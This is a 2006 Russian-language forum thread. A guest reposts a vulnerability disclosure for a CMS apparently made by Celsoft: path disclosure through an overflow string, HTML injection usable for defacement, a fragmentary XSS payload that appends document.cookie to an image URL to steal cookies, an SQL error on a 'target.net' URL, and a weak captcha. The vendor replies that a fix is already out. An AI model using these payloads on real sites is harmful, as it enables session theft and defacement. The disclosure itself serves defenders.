Гость BadHal Опубликовано: 30 марта 2006 Рассказать Опубликовано: 30 марта 2006 [Раскрытие установочного пути] В parse.class.php выделено 12582912 байт на проверку сообщения. Переполнение делается так: "<<><><><><><>>" [Управление генерированием страниц] На некоторых системах удалось выполнять простые html теги : <br></td><plaintext></td><hr><form><input& gt; Что может сказаться на внешнем виде сайта, ака deface по быстрому. [ХСС] Угнать кукисы можно при помощи вставки картинки. gif?id="+document.cookie;'><!--' alt='> gif?id="+document.cookie;'><!--'> Если установлен форум, то куки приходят и от него. [Проблемы с SQL] http://target.net/category/topic/ -- где topic -- это не существующая тема. Результат: SELECT id FROM nws_category WHERE parentid=not detected ; Может, народные умельцы, в скором времени, что и придумают. :р [antibot] antibot.php не справляеться со своей задачей, при одновременном коннетке он выдаёт одинаковые картинки. Источник: http://security.nnov.ru/Mdocument13.html Хотелось бы узнать что Celsoft думает по этому поводу? Ссылка на сообщение Поделиться на других сайтах
celsoft 6 072 Опубликовано: 30 марта 2006 Рассказать Опубликовано: 30 марта 2006 Ух ты а мы и не знали пока ты будешь ждать что я думаю по этому поводу, твой сайт могут взломать, фик был выпущен еще вчера http://forum.pc-soft.ru/index.php?showtopic=25506&hl= Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения